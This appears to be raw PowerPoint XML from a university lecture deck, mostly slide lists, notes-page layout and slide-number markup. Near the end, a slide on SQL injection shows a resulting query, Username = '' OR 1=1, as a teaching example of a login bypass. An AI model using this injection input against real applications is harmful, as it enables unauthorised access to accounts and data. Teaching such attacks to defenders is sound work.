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649" r:id="rId2"/>
    <p:sldId id="650" r:id="rId3"/>
    <p:sldId id="651" r:id="rId4"/>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="535" r:id="rId6"/>
    <p:sldId id="481" r:id="rId7"/>
    <p:sldId id="530" r:id="rId8"/>
    <p:sldId id="511" r:id="rId9"/>
    <p:sldId id="352" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="362" r:id="rId12"/>
    <p:sldId id="417" r:id="rId13"/>
    <p:sldId id="533" r:id="rId14"/>
    <p:sldId id="330" r:id="rId15"/>
    <p:sldId id="331" r:id="rId16"/>
    <p:sldId id="329" r:id="rId17"/>
    <p:sldId id="328" r:id="rId18"/>
    <p:sldId id="562" r:id="rId19"/>
    <p:sldId id="263" r:id="rId20"/>
    <p:sldId id="264" r:id="rId21"/>
    <p:sldId id="348" r:id="rId22"/>
    <p:sldId id="304" r:id="rId23"/>
    <p:sldId id="358" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="486" r:id="rId26"/>
    <p:sldId id="343" r:id="rId27"/>
    <p:sldId id="340" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="472" r:id="rId30"/>
    <p:sldId id="376" r:id="rId31"/>
    <p:sldId id="648" r:id="rId32"/>
    <p:sldId id="270" r:id="rId33"/>
    <p:sldId id="271" r:id="rId34"/>
    <p:sldId id="385" r:id="rId35"/>
    <p:sldId id="277" r:id="rId36"/>
    <p:sldId id="477" r:id="rId37"/>
    <p:sldId id="496" r:id="rId38"/>
    <p:sldId id="497" r:id="rId39"/>
    <p:sldId id="498" r:id="rId40"/>
    <p:sldId id="499" r:id="rId41"/>
    <p:sldId id="503" r:id="rId42"/>
    <p:sldId id="500" r:id="rId43"/>
    <p:sldId id="501" r:id="rId44"/>
    <p:sldId id="502" r:id="rId45"/>
    <p:sldId id="529" r:id="rId46"/>
    <p:sldId id="558" r:id="rId47"/>
    <p:sldId id="504" r:id="rId48"/>
    <p:sldId id="463" r:id="rId49"/>
    <p:sldId id="464" r:id="rId50"/>
    <p:sldId id="494" r:id="rId51"/>
    <p:sldId id="495" r:id="rId52"/>
    <p:sldId id="492" r:id="rId53"/>
    <p:sldId id="493" r:id="rId54"/>
    <p:sldId id="451" r:id="rId55"/>
    <p:sldId id="554" r:id="rId56"/>
    <p:sldId id="545" r:id="rId57"/>
    <p:sldId id="453" r:id="rId5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35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6" y="0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9FABDBC5-F080-428D-89A7-936F20C52521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6" y="9720755"/>
            <a:ext cx="3077137" cy="512222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394739F-9F6D-4DD6-971E-8806E517B1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533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ECEF8652-BAE8-43D6-B96E-9E5EE90E8754}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>25/09/2024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55749A9B-4762-4BC7-AB56-F145381E25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5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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{DE9BEAB8-262D-4367-9195-647E00B57E43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tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld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Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5668509" cy="470135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48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B07FD6F4-9C6E-43CB-8AC7-2FCF8E6E528E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20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60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B07FD6F4-9C6E-43CB-8AC7-2FCF8E6E528E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21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020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439637A6-9234-4831-9A5D-7F91310392DB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22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87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439637A6-9234-4831-9A5D-7F91310392DB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23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08547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08548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083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FB7AAA9A-E78B-43F8-9AE7-F1185432F07E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24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09571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09572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16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D550023D-A403-497F-BD78-4EE37DF165DF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28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10596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955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E436E752-8970-425F-BF39-42F661CD31B2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29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1045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https://blackboard.ru.nl/webapps/discussionboard/do/message?action=list_messages&amp;course_id=_112663_1&amp;nav=discussion_board_entry&amp;conf_id=_228613_1&amp;forum_id=_289924_1&amp;message_id=_1012115_1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893710F8-2816-45F7-B8E7-E5198CFEB6C4}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="522771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F1BA8C2B-AEAC-47B4-9C1F-CDDCEE232FAB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33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12643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12644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7080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E436E752-8970-425F-BF39-42F661CD31B2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36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11619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11620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376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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{1FA93C76-6325-40EA-8F89-18185612C55C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tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld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83218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5668509" cy="470135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796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37665463-64A9-4B90-8EE7-B965C036BE57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44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14691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14692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456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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{74A010D7-7B5B-4283-A7F7-990284F470BC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tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld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183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US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/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5668509" cy="470135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286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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{EBE061ED-62DD-42A9-93E4-7FED56EF4B93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tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld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379" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101380" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5668509" cy="4701351"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln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910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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{C620A24E-2225-4700-91F8-DA038A654E11}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/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1183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5671723" cy="470309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206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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{D3145DDB-1F12-40F1-999A-4D42E4A7982F}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US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710573" y="4862141"/>
            <a:ext cx="5671723" cy="470309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894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82023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{FB2B4291-A329-4895-9F90-F605C1A09745}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183218" y="767248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59" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5671723" cy="470309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67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tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="482023" algn="l"/>
                <a:tab pos="964044" algn="l"/>
                <a:tab pos="1447711" algn="l"/>
                <a:tab pos="1929734" algn="l"/>
                <a:tab pos="2413401" algn="l"/>
                <a:tab pos="2895422" algn="l"/>
                <a:tab pos="3379089" algn="l"/>
                <a:tab pos="3861112" algn="l"/>
                <a:tab pos="4344779" algn="l"/>
                <a:tab pos="4826800" algn="l"/>
                <a:tab pos="5310468" algn="l"/>
                <a:tab pos="5792490" algn="l"/>
                <a:tab pos="6276157" algn="l"/>
                <a:tab pos="6758179" algn="l"/>
                <a:tab pos="7241846" algn="l"/>
                <a:tab pos="7723868" algn="l"/>
                <a:tab pos="8207535" algn="l"/>
                <a:tab pos="8689557" algn="l"/>
                <a:tab pos="9171579" algn="l"/>
                <a:tab pos="9655246" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{33E4C1DF-585A-4C67-A90E-928E1FDAA319}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="482023" algn="l"/>
                  <a:tab pos="964044" algn="l"/>
                  <a:tab pos="1447711" algn="l"/>
                  <a:tab pos="1929734" algn="l"/>
                  <a:tab pos="2413401" algn="l"/>
                  <a:tab pos="2895422" algn="l"/>
                  <a:tab pos="3379089" algn="l"/>
                  <a:tab pos="3861112" algn="l"/>
                  <a:tab pos="4344779" algn="l"/>
                  <a:tab pos="4826800" algn="l"/>
                  <a:tab pos="5310468" algn="l"/>
                  <a:tab pos="5792490" algn="l"/>
                  <a:tab pos="6276157" algn="l"/>
                  <a:tab pos="6758179" algn="l"/>
                  <a:tab pos="7241846" algn="l"/>
                  <a:tab pos="7723868" algn="l"/>
                  <a:tab pos="8207535" algn="l"/>
                  <a:tab pos="8689557" algn="l"/>
                  <a:tab pos="9171579" algn="l"/>
                  <a:tab pos="9655246" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1183218" y="767248"/>
            <a:ext cx="4732866" cy="383797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559" tIns="48280" rIns="96559" bIns="48280" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710573" y="4862141"/>
            <a:ext cx="5671723" cy="4703099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36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  <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="465138" algn="l"/>
                <a:tab pos="930275" algn="l"/>
                <a:tab pos="1397000" algn="l"/>
                <a:tab pos="1862138" algn="l"/>
                <a:tab pos="2328863" algn="l"/>
                <a:tab pos="2794000" algn="l"/>
                <a:tab pos="3260725" algn="l"/>
                <a:tab pos="3725863" algn="l"/>
                <a:tab pos="4192588" algn="l"/>
                <a:tab pos="4657725" algn="l"/>
                <a:tab pos="5124450" algn="l"/>
                <a:tab pos="5589588" algn="l"/>
                <a:tab pos="6056313" algn="l"/>
                <a:tab pos="6521450" algn="l"/>
                <a:tab pos="6988175" algn="l"/>
                <a:tab pos="7453313" algn="l"/>
                <a:tab pos="7920038" algn="l"/>
                <a:tab pos="8385175" algn="l"/>
                <a:tab pos="8850313" algn="l"/>
                <a:tab pos="9317038" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{8F9FD4CF-F59D-4330-9D46-BF309B006DCE}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buFont typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:buNone/>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                  <a:tab pos="465138" algn="l"/>
                  <a:tab pos="930275" algn="l"/>
                  <a:tab pos="1397000" algn="l"/>
                  <a:tab pos="1862138" algn="l"/>
                  <a:tab pos="2328863" algn="l"/>
                  <a:tab pos="2794000" algn="l"/>
                  <a:tab pos="3260725" algn="l"/>
                  <a:tab pos="3725863" algn="l"/>
                  <a:tab pos="4192588" algn="l"/>
                  <a:tab pos="4657725" algn="l"/>
                  <a:tab pos="5124450" algn="l"/>
                  <a:tab pos="5589588" algn="l"/>
                  <a:tab pos="6056313" algn="l"/>
                  <a:tab pos="6521450" algn="l"/>
                  <a:tab pos="6988175" algn="l"/>
                  <a:tab pos="7453313" algn="l"/>
                  <a:tab pos="7920038" algn="l"/>
                  <a:tab pos="8385175" algn="l"/>
                  <a:tab pos="8850313" algn="l"/>
                  <a:tab pos="9317038" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"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106499" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1132946" y="744160"/>
            <a:ext cx="4531783" cy="372248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3177" tIns="46589" rIns="93177" bIns="46589" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106500" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680384" y="4715832"/>
            <a:ext cx="5427673" cy="4559880"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/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17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56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229600" cy="4857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fld id="{AF2AEC77-7434-46CA-BE34-C63E21E2B0BF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C00000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 Rounded MT Bold" panose="020F07040305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f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DA40B6-C7C2-4B80-31A5-5AE928640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 last week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BC7DD-4E77-0AC9-670D-EC8E3E09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BBC5B9-63A7-37F9-41A5-4B2F21CD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C9F4F6-FB82-5A5A-D561-16DB54A14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201" y="802171"/>
            <a:ext cx="6228343" cy="28181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631902-2D06-0E17-B620-549A99C1B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494" y="3670931"/>
            <a:ext cx="5728858" cy="220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366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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2253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/>
              <a:t>Resulting SQL query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00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>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    SELECT * FROM Accounts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>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    WHERE Username = ’’ OR 1=1;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>
                <a:solidFill>
